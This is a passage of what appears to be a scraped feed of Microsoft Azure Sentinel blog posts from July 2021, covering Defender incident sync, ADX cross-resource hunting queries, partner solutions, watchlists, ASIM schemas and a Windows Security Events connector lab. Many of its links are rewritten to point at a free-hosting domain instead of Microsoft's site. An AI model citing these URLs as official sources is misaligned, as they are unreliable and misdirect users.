A SIEM delivers visibility into the full kill chain across the entire organization, including third party data, while XDR delivers deeper insights with contextual alerts for multi-cloud and multi-platform resources to reduce false alerts.&nbsp;</P> <P>At Microsoft Ignite 2021 in March, we <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-ignite-2021-what-s-new-in-azure-sentinel/ba-p/2175225" target="_blank" rel="noopener">announced</A> an important step in bringing you the most integrated SIEM and XDR on the market with the release of incident sharing between Microsoft 365 Defender and Azure Sentinel.&nbsp; Today, we are continuing the journey by announcing the public preview of incident sharing for Azure Defender and Azure Sentinel.&nbsp; Now, Microsoft delivers the only integrated SIEM and XDR with incident sharing across the full set of components.</P> <P>Using this new capability, customers can use Azure Sentinel as their single pane of glass for incident triage, leverage Microsoft 365 Defender or Azure Defender for incident investigation and remediation, and stay seamlessly in sync across all three products. 
This new capability helps reduce the overall time you spend on responding to incidents – giving you more time to focus on what’s important.</P> <P>&nbsp;</P> <H1>How does it work?</H1> <P>Azure Defender &amp; Sentinel bi-directional status sync automatically syncs alert and incident statuses between the products:</P> <UL> <LI>Closing or updating incidents in Azure Sentinel containing Azure Defender alerts will automatically close/update the status of the alert in the Azure Defender portal.</LI> <LI>Alerts closed in Azure Defender will be reflected as closed in Sentinel, but the status of the incident containing them will remain unchanged.</LI> </UL> <P>&nbsp;</P> <H1>How to enable it?</H1> <OL> <LI>In Azure Sentinel, navigate to the data connectors tab and open the Azure Defender data connector.</LI> <LI>You can configure on which subscriptions you would like the bi-directional sync to take effect by changing the drop down in the “Bi-directional sync (Preview)” column to “Enabled”. 
<OL> <LI>Notice – enabling bi-directional sync requires <STRONG>contributor</STRONG> permission in the selected subscription.</LI> </OL> </LI> <LI>To enable bi-directional sync on several subscriptions at once, mark their check boxes and select the “Enable bi-directional sync” button on the bar above the list.</LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ScottWoodgate_0-1627312328936.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298375i60E2615E0E6BD7C6/image-size/medium?v=v2&amp;px=400" role="button" title="ScottWoodgate_0-1627312328936.png" alt="ScottWoodgate_0-1627312328936.png" /></span></P> <P>&nbsp;</P> <P>We are excited about these new capabilities and will continue our mission to help you protect your companies.&nbsp; Stay tuned for more SIEM and XDR integration!</P> <P>&nbsp;</P> <H1>Further reading</H1> <UL> <LI>Official Azure Sentinel documentation - <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-security-center</A></LI> <LI><A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/export-to-siem#stream-alerts-to-azure-sentinel</A></LI> </UL> Mon, 26 Jul 2021 17:25:04 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/integrating-siem-xdr-azure-sentinel-and-azure-defender-bi/ba-p/2587343 Scott Woodgate 2021-07-26T17:25:04Z What’s New: Azure Sentinel Hunting supports ADX cross-resource queries https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-hunting-supports-adx-cross-resource/ba-p/2530678 <P>Now in preview, you can use Azure Data Explorer (ADX) <A href="#" target="_blank" rel="noopener">cross-resource queries</A> from within the hunting query page, the livestream page, and the logs (Log Analytics) page. 
Although Log Analytics remains the primary data storage location for performing analysis with Azure Sentinel, there are cases where ADX is required to store data due to cost, retention periods, or other factors.</P> <P>&nbsp;</P> <P>You can learn more about sending logs from Azure Sentinel to Azure Data Explorer for long-term retention here: <A href="#" target="_self">Integrate Azure Data Explorer for long-term log retention</A></P> <P>&nbsp;</P> <P><STRONG>Creating cross-resource queries&nbsp;&nbsp;</STRONG></P> <P>To query data stored in ADX clusters, simply use the adx() function to specify the ADX cluster, database name, and desired table. 
You can then query the output as you would any other table.&nbsp; If you have access to an ADX cluster with active data, it is super easy to try.</P> <P>&nbsp;</P> <P>Here is a brief summary of the adx() function syntax to help get you started:</P> <PRE>adx("&lt;<EM>Cluster URI</EM>&gt;/&lt;<EM>Database Name</EM>&gt;").&lt;<EM>Table Name</EM>&gt;</PRE> <P>&nbsp;</P> <P>Here is an example query that accesses public data:</P> <PRE>adx("https://help.kusto.windows.net/Samples").StormEvents | take 5</PRE> <P>You can find the full details here: <A href="#" target="_blank" rel="noopener">Cross-query your Log Analytics or Application Insights resources and Azure Data Explorer</A></P> <P>&nbsp;</P> <P><STRONG>Using cross-resource queries on the hunting queries, livestream, and logs pages&nbsp;</STRONG></P> <P>Once you know how to construct cross-resource queries, using them in the hunting experience is easy. Go to the hunting queries page and click "+ New query" to create a new custom query.&nbsp; Add&nbsp;your cross-resource query to the "Custom Query" field as you would for any other hunting query.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ADX_Hunting_Query.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295553i9584B21183044FA7/image-size/large?v=v2&amp;px=999" role="button" title="ADX_Hunting_Query.png" alt="ADX_Hunting_Query.png" /></span></P> <P>&nbsp;</P> <P>The&nbsp;process is similar for the livestream experience. 
On the hunting page livestream tab, click "+ New Livestream" to open the livestream query authoring experience:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ADX_Livestream.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295554i070238BF4FAA27D9/image-size/large?v=v2&amp;px=999" role="button" title="ADX_Livestream.png" alt="ADX_Livestream.png" /></span></P> <P>&nbsp;</P> <P>You can also create cross-resource queries directly in the Azure Sentinel Logs (Log Analytics) experience. This is very convenient when iterating on and refining your queries during the hunting process, as well as diagnosing and resolving query errors.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="BenNick_0-1625790289375.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294522i7558DA2E982C40BC/image-size/large?v=v2&amp;px=999" role="button" title="BenNick_0-1625790289375.png" alt="BenNick_0-1625790289375.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Additional Information</STRONG></P> <P>There are no performance guarantees for querying over ADX data from Azure Sentinel.&nbsp; Additionally, this preview only supports cross-resource queries for the previously mentioned features.&nbsp; Features such as Analytics do not support cross-resource queries.</P> <P>&nbsp;</P> <P><STRONG>Learn more:</STRONG></P> <P>Find out more about the following topics:</P> <UL> <LI>Cross-resource queries:&nbsp;<A href="#" target="_blank" rel="noopener">Cross-query your Log Analytics or Application Insights resources and Azure Data Explorer</A></LI> <LI>Using hunting queries:&nbsp;<A href="#" target="_blank" rel="noopener">Hunt for threats with Azure Sentinel</A></LI> <LI>Using livestream:&nbsp;<A href="#" target="_blank" rel="noopener">Use hunting livestream in Azure Sentinel to detect threats</A></LI> <LI>Sending logs from Azure Sentinel to Azure Data Explorer: <A href="#" target="_self">Integrate Azure Data Explorer for long-term log retention</A></LI> </UL> <P>&nbsp;</P> Wed, 14 Jul 2021 19:00:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-hunting-supports-adx-cross-resource/ba-p/2530678 Ben Nick 2021-07-14T19:00:00Z Azure Sentinel Solutions for Partners: Build Combined Value for a Wider Audience https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-solutions-for-partners-build-combined-value-for-a/ba-p/2547174 <P>At the RSA Conference in May, we were excited to announce the release of <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions</A>, a new way for Azure Sentinel customers to discover and deploy use cases and integrations faster than ever.</P> <P>&nbsp;</P> <P>Solutions make it easy to enable new use-cases for Azure Sentinel by consolidating related data connectors, analytics rules, interactive workbooks, and automation playbooks into a single package to deliver end-to-end product, domain, or industry vertical value for customers.</P> <P>&nbsp;</P> <P>With solutions, customers can more easily detect and respond to threats with out-of-the-box content for their critical use cases, all in one package. 
They can empower their SOC team with content developed by Microsoft’s security experts – and our trusted technology partners – with instant deployment. Our investment in solutions and our expanding partner network is key to helping customers stay secure and protect their organizations.</P> <P>&nbsp;</P> <P>A new blade in Azure Sentinel offers a growing marketplace of solutions designed to help customers protect their entire digital estate and integrate Azure Sentinel with their existing security infrastructure to operationalize their critical use cases. The marketplace now features more than 40 solutions, including:</P> <UL> <LI>Cloudflare and Palo Alto Prisma solutions to give you visibility into your cloud workloads. This week, we also released new solutions to help you monitor multi-cloud environments, with solutions for GCP Identity and Access Management, GCP CloudDNS, and GCP CloudMonitor.</LI> <LI>Threat intelligence solutions from RiskIQ and ReversingLabs to enrich your threat detection, hunting and response capabilities.</LI> <LI>Azure SQL and Oracle database audit solutions to monitor your database anomalies.</LI> <LI>…And many others, with even more to come. Just this week, we released an additional ten solutions into Public Preview. In addition to the new multi-cloud solutions mentioned above, we’re releasing solutions for Sophos Endpoint Protection, Cisco Application Centric Interface, Web Security Appliance, Secure email Gateway, TrendMicro ApexOne, McAfee Network Security Platform and anti-virus information, InsightVM Cloud API (Rapid7) and Juniper Intrusion Detection and Prevention.</LI> </UL> <P>Solutions make it easier and faster for customers to use Azure Sentinel. 
They also represent a significant opportunity for our technology partners.</P> <P>&nbsp;</P> <H2>Azure Sentinel solutions and partners</H2> <P>&nbsp;</P> <P>Solutions make it easier than ever for joint customers to discover, deploy, and maximize the value of the integrations that our technology partners create. With solutions, partners can:</P> <P>&nbsp;</P> <P><STRONG>Unlock more value for your current customers and create new use cases.</STRONG> When you build an Azure Sentinel solution, you’re giving your customers everything they need to start maximizing the security value that your product or service already gives them – by building detections on top of that data, enabling them to cross-correlate it with the rest of their ecosystem, streamlining investigation via the investigation graph, automating responses, and more. By delivering solutions you have an opportunity to deeply integrate with each of these Azure Sentinel SIEM and SOAR capabilities to not only deliver combined value for your current offerings but also expand to newer use cases that Azure Sentinel has to offer currently and in the future.</P> <P>&nbsp;</P> <P><STRONG>Reach new customers.</STRONG> &nbsp;Broaden discoverability and reach a new customer base through the Azure Sentinel solutions marketplace. Azure Sentinel solutions integrate with <A href="#" target="_blank" rel="noopener">Azure Marketplace</A>, and the solutions you deliver are showcased both in the Azure Sentinel solutions blade and in the Azure Marketplace. Hence delivering solutions gives you a direct connection to a potentially new and broad customer base.</P> <P>&nbsp;</P> <P><STRONG>Productize your investments.</STRONG> Enable customers to deploy integrations with just a few clicks by combining content into one single, easily discoverable, easily deployable package - consolidating value across data connectors, analytics, playbooks, and more. 
With solutions, you are delivering a combined productized value for your offerings in Azure Sentinel to deliver end-to-end scenarios in Azure Sentinel for our mutual customers.</P> <P>&nbsp;</P> <P>Here are some examples of use cases partners can deliver as Azure Sentinel solutions:</P> <UL> <LI><STRONG>Product value</STRONG> – Direct product or service integrations to deliver your product value in Azure Sentinel. Some examples include the Azure SQL, Cisco Umbrella, CrowdStrike, and Check Point solutions.</LI> <LI><STRONG>Domain value</STRONG> – Content to deliver domain value in areas like threat intelligence, insider threat, compliance, and more. Some examples include the HYAS, ReversingLabs, or RiskIQ solutions.</LI> <LI><STRONG>Industry vertical value</STRONG> – Deliver industry vertical value in areas like ERP, healthcare, finance, retail, etc. Some examples include the SAP or Microsoft Dynamics solutions.</LI> <LI>Refer to the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions catalog</A> to discover more. Define your own unique use cases to deliver customer value!</LI> </UL> <P>As we continue to build more value into solutions and work with technology partners to expand our library of solutions, the possibilities with solutions will only continue to grow.</P> <P>&nbsp;</P> <H2>Building your Azure Sentinel solution</H2> <P>&nbsp;</P> <P>So, how can technology partners get started with building their own Azure Sentinel solution? There are three key steps to this process: building content, packaging content, and listing the offering. Refer to the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions build guide</A> for further details on this 3-step process.</P> <P>&nbsp;</P> <P><STRONG>Build content</STRONG></P> <P>First, you need to start by building the content you want to include in your solution – including data connectors, workbooks, playbooks, analytics, hunting rules, and more. 
You can learn more about how to create content in the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub getting started documentation</A>. &nbsp;</P> <P>&nbsp;</P> <P>After content is submitted, it will be validated and reviewed by the Azure Sentinel team. After any feedback is addressed, you can move on to packaging your content.</P> <P>&nbsp;</P> <P><STRONG>Package content</STRONG></P> <P>After content is approved, the next step is to package content into the solution. We provide a <A href="#" target="_blank" rel="noopener">packaging tool</A> for this process. <A href="#" target="_blank" rel="noopener">Follow the guidance</A> to create your solution package and validate. &nbsp;&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Publish the solution </STRONG></P> <P>The Azure Sentinel solution publishing process is powered by the <A href="#" target="_blank" rel="noopener">Microsoft Partner Center.</A> After a one-time registration in the Partner Center, you can create your offering, configure its details, and publish. During this phase, the Azure Sentinel team will also step in to help you get this solution listed in the Azure Sentinel solutions gallery within the Azure Sentinel interface. Refer to Step-3 in the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions build guide</A> for step-by-step guidance.</P> <P>&nbsp;</P> <H2>Getting started – and announcing the Azure Sentinel 2021 Hackathon</H2> <P>&nbsp;</P> <P>We’re very excited about the new possibilities that the launch of Azure Sentinel solutions opens and the wider audience that it gives our technology partners. This is only the beginning, and we’re looking forward to continuing to expand the capabilities of solutions and tap into the possibilities that they offer.</P> <P>&nbsp;</P> <P>If you’re interested in building an Azure Sentinel solution, now is the perfect time to get started building content! We recently kicked off the second annual Azure Sentinel Hackathon. 
This hackathon challenges security experts around the globe to build end-to-end cybersecurity solutions for Azure Sentinel that deliver enterprise value by collecting data, managing security, detecting, hunting, investigating, and responding to constantly evolving threats. You can also win a piece of the $19,000 cash prize pool. Learn more about the hackathon <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335" target="_blank" rel="noopener">here</A>.</P> <P>&nbsp;</P> <P>To learn more about solutions, visit the following resources:</P> <UL> <LI>Learn more about Azure Sentinel solutions in <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">the announcement blog from RSA Conference</A>.</LI> <LI>Read the <A href="#" target="_blank" rel="noopener">Azure Sentinel solution documentation</A> for more details.</LI> <LI>Learn how to build solutions in the <A href="#" target="_blank" rel="noopener">Azure Sentinel solution build guide</A>.</LI> <LI>Visit the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions catalog</A> to see the solutions that are available today.</LI> </UL> <P>We’d love to hear from you as you embark on the solutions creation journey! 
Let us know your feedback using any of the channels listed in the&nbsp;<A href="#" target="_blank" rel="noopener">Resources</A>.</P> Wed, 14 Jul 2021 14:44:13 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-solutions-for-partners-build-combined-value-for-a/ba-p/2547174 Preeti_Krishna 2021-07-14T14:44:13Z Watchlist is now Generally Available https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/watchlist-is-now-generally-available/ba-p/2533859 <P><STRONG>Today we are announcing the General Availability (GA) of Azure Sentinel Watchlist to all regions!</STRONG></P> <P>&nbsp;</P> <P>Azure Sentinel watchlists enable the collection of data from external data sources for correlation with the events in your Azure Sentinel environment. Watchlists are stored in your Azure Sentinel workspace as name-value pairs and are cached for optimal query performance and low latency.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WL-GA-Blog-Post.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295069iA8BBA3436DCD8CD0/image-size/large?v=v2&amp;px=999" role="button" title="WL-GA-Blog-Post.gif" alt="WL-GA-Blog-Post.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Get started today with these watchlist use cases:</STRONG></P> <UL> <LI><STRONG>Import data from csv for analytic rules &amp; hunting</STRONG>. Utilize the watchlist name/value pairs for joining and filtering for use in analytic rules, threat hunting, workbooks, notebooks and for general queries.&nbsp;For a full list of the functionalities and the step-by-step instructions, refer to the <A href="#" target="_blank" rel="noopener">official documentation</A>.</LI> <LI><STRONG>Update your watchlist using the new user interface</STRONG>. Add new or update existing watchlist items via an Excel-like grid. Add/remove columns from the UI for better usability. 
See <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476" target="_self">this article</A> for more information.</LI> <LI><STRONG>Automate watchlist operations with playbooks</STRONG>. Use watchlists in Logic App playbooks as part of your security automation for incidents, alerts, and more. Click <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-subscription-owner/ba-p/1768917" target="_self">here</A> for a two-part tutorial, and also check out the playbooks in the GitHub repo (<A href="#" target="_self">link</A>; look for all of the playbooks with "watchlist" in the name).</LI> <LI><STRONG>Automatically update IPs used by the major cloud providers.</STRONG> Using a watchlist function (<A href="#" target="_self">link</A>), <SPAN>create a watchlist for each cloud provider (Azure, AWS, GCP) and automatically update their respective IP ranges to enable allow-list or block-list detections, or for queries and reports.</SPAN></LI> <LI><STRONG>Deploy via ARM for bulk deployments</STRONG>. Use ARM templates for quick deployment scenarios as well as bulk deployments. Learn more <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429" target="_self">here</A> to get started with links and examples.</LI> <LI><STRONG>Import watchlists with curated IOCs</STRONG>. Use watchlist ARM templates for curating and sharing non-Sentinel data across workspaces. 
Check out the Watchlist section in our GitHub repo for examples like <A href="#" target="_self">this</A> one for the Nobelium cyber attack.</LI> </UL> <P>Enjoy!</P> <P>Azure Sentinel Watchlist Team</P> Mon, 12 Jul 2021 18:13:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/watchlist-is-now-generally-available/ba-p/2533859 JulianGonzalez 2021-07-12T18:13:09Z What's new: ASIM Authentication, Process, Registry and enhanced Network schemas https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268 <TABLE style="border-style: none; width: 100%;" width="100%"> <TBODY> <TR> <TD width="100%"> <P>Hello everyone,</P> <P>&nbsp;</P> <P>Continuing our <A href="#" target="_blank" rel="noopener">normalization journey</A>, we have added the <A href="#" target="_blank" rel="noopener">Authentication</A>, <A href="#" target="_blank" rel="noopener">Process Events</A>, and <A href="#" target="_blank" rel="noopener">Registry Events</A> schemas alongside the existing networking and <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926" target="_blank" rel="noopener">DNS</A> schemas, and delivered normalized content based on them. 
We also added ARM template deployment and support for Microsoft Defender for Endpoint to the <A href="#" target="_blank" rel="noopener">Network Schema</A>.</P> <P>&nbsp;</P> <P data-unlink="true">Special thanks to @Yuval Naor, @Yaron Fruchtmann, and @Batami Gold, who made all this possible.</P> <P>&nbsp;</P> <H2>Why should you care?</H2> <P>&nbsp;</P> <UL> <LI><STRONG>Cross-source detection:</STRONG> Normalized Authentication analytic rules work across sources, on-prem and cloud, now detecting attacks such as brute force or impossible travel across systems including Okta, AWS, and Azure.</LI> <LI><STRONG>Source-agnostic rules</STRONG>: process event analytics support any source that a customer may use to bring in the data, including Defender for Endpoint, Windows Events, and Sysmon. We are ready to add <A href="#" target="_blank" rel="noopener">Sysmon for Linux</A> and WEF once released!</LI> <LI><STRONG>EDR</STRONG> support: Process, Registry, Network, and Authentication constitute the core of EDR event telemetry.</LI> <LI><STRONG>Ease of use</STRONG>: The <A href="#" target="_blank" rel="noopener">Network Schema</A> introduced last year is now easier to use with a single-click ARM template deployment.</LI> </UL> <P>&nbsp;</P> <P>Deploy the <A href="#" target="_blank" rel="noopener">Authentication</A>, <A href="#" target="_blank" rel="noopener">Process Events</A>, <A href="#" target="_blank" rel="noopener">Registry Events</A>, or <A href="#" target="_blank" rel="noopener">Network Session</A> parser packs in a single click using ARM templates.</P> <P>&nbsp;</P> <P>Join us to learn more about the Azure Sentinel information model in <A href="#" target="_blank" rel="noopener">two webinars</A>:</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel</STRONG></LI> <LI><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content</STRONG></LI> </UL> <H2><STRONG>Why normalization, and what is the Azure Sentinel Information Model?</STRONG></H2> <P>&nbsp;</P> <P>Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, and write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types, which investigation and hunting require, is also tricky.</P> <P>&nbsp;</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the <A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A> common information model, promoting vendor-agnostic, industry-wide normalization. ASIM:</P> <UL> <LI>Allows source-agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in Sentinel workspaces</LI> </UL> <P>&nbsp;</P> <TABLE style="border-style: hidden;"> <TBODY> <TR> <TD width="335"> <P>The current implementation is based on query-time normalization using KQL functions, and includes the following:</P> <UL> <LI><STRONG>Normalized schemas</STRONG> cover standard sets of predictable event types that are easy to work with and to build unified capabilities on. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG>Parsers</STRONG> map existing data to the normalized schemas. Parsers are implemented using <A href="#" target="_blank" rel="noopener">KQL functions</A>.</LI> <LI><STRONG>Content for each normalized schema</STRONG> includes analytics rules, workbooks, hunting queries, and additional content. 
This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>&nbsp;</P> </TD> <TD width="670"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ofer_Shezaf_0-1625063752942.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/292571iBEA7BF3B5E708551/image-size/large?v=v2&amp;px=999" role="button" title="Ofer_Shezaf_0-1625063752942.png" alt="Ofer_Shezaf_0-1625063752942.png" /></span> <P>&nbsp;</P> </TD> </TR> </TBODY> </TABLE> </TD> </TR> <TR> <TD width="100%"> <P>Ofer Shezaf</P> <P>Principal Product Manager, Azure Sentinel</P> </TD> </TR> </TBODY> </TABLE> Fri, 02 Jul 2021 14:38:05 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268 Ofer_Shezaf 2021-07-02T14:38:05Z Testing the New Version of the Windows Security Events Connector with Azure Sentinel To-Go! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/testing-the-new-version-of-the-windows-security-events-connector/ba-p/2483369 <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1624588039379.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291175iC2FCABD1976A6547/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1624588039379.png" alt="Cyb3rWard0g_7-1624588039379.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Last week, on&nbsp;Monday June 14</SPAN><SPAN data-contrast="auto">th</SPAN><SPAN data-contrast="auto">,&nbsp;2021,&nbsp;a&nbsp;new version of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Windows Security Events data connector</SPAN></A><SPAN data-contrast="auto">&nbsp;reached public preview. 
This is the first data connector created leveraging the new generally available </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor Agent (AMA)</SPAN></A><SPAN data-contrast="auto"> and </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules (DCR)</SPAN></A><SPAN data-contrast="auto"> features from the Azure Monitor ecosystem. As with any other new feature in Azure Sentinel, I wanted to expedite the testing process and empower others in the InfoSec community to learn more about it through a lab environment.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In this post, I will talk about the new features of the new data connector and how to automate the deployment of an Azure Sentinel instance with the connector enabled, the creation and association of DCRs, and the installation of the AMA on a Windows workstation. This is an extension of </SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part2-integrating-a-basic-windows-lab-via/ba-p/1742165" target="_blank" rel="noopener"><SPAN data-contrast="none">a blog post</SPAN></A><SPAN data-contrast="auto"> I wrote last year (2020), where I covered the collection of Windows security events via the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Agent (Legacy)</SPAN></A><SPAN data-contrast="auto">.</SPAN></P> <H2><SPAN data-contrast="none">Recommended Reading</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I highly recommend reading 
the following blog posts to&nbsp;learn more about&nbsp;the announcement of the new Azure Monitor features and the Windows Security Events data connector:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor Agent and Data Collection Rules now generally available | Azure updates | Microsoft Azure</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-monitor/a-powerful-agent-for-azure-monitor-and-a-simpler-world-of-data/ba-p/2443285" target="_blank" rel="noopener"><SPAN data-contrast="none">A powerful agent for Azure Monitor and a simpler world of data collection; now generally available! 
- Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Connect Windows security event data to Azure Sentinel (tabbed version) | Microsoft Docs</SPAN><SPAN>&nbsp;</SPAN></A><BR /><BR /></LI> </UL> <H2 aria-level="1"><SPAN data-contrast="none">Azure Sentinel To-Go!?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_self">Azure Sentinel2Go</A> is an open-source project&nbsp;maintained and developed by the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Threat Research community</SPAN></A><SPAN data-contrast="auto">&nbsp;to&nbsp;automate&nbsp;the deployment of an Azure Sentinel&nbsp;research&nbsp;lab and a data ingestion pipeline to consume pre-recorded datasets.&nbsp;Every&nbsp;environment I release through this initiative is an environment I use and test while performing research as part of my role in the MSTIC R&amp;D team. 
Therefore, I am constantly&nbsp;trying to improve&nbsp;the deployment templates&nbsp;as I cover more scenarios.&nbsp;Feedback is greatly appreciated.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">A New Version of the&nbsp;Windows Security Events Connector?</SPAN><SPAN>&nbsp;<BR /></SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">According to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft docs</SPAN></A><SPAN data-contrast="auto">,&nbsp;the Windows Security Events connector lets you stream security events from any Windows server (physical or virtual, on-premises or in any cloud) connected to your Azure Sentinel workspace.&nbsp;After last week, there are now two versions of this connector:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="42" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Security events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(legacy version): Based on the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Log Analytics Agent</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(Usually known as the Microsoft Monitoring&nbsp;Agent (MMA)&nbsp;or Operations Management Suite (OMS)&nbsp;agent).</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="42" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Windows Security Events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(new version): Based on the new&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Azure Monitor Agent 
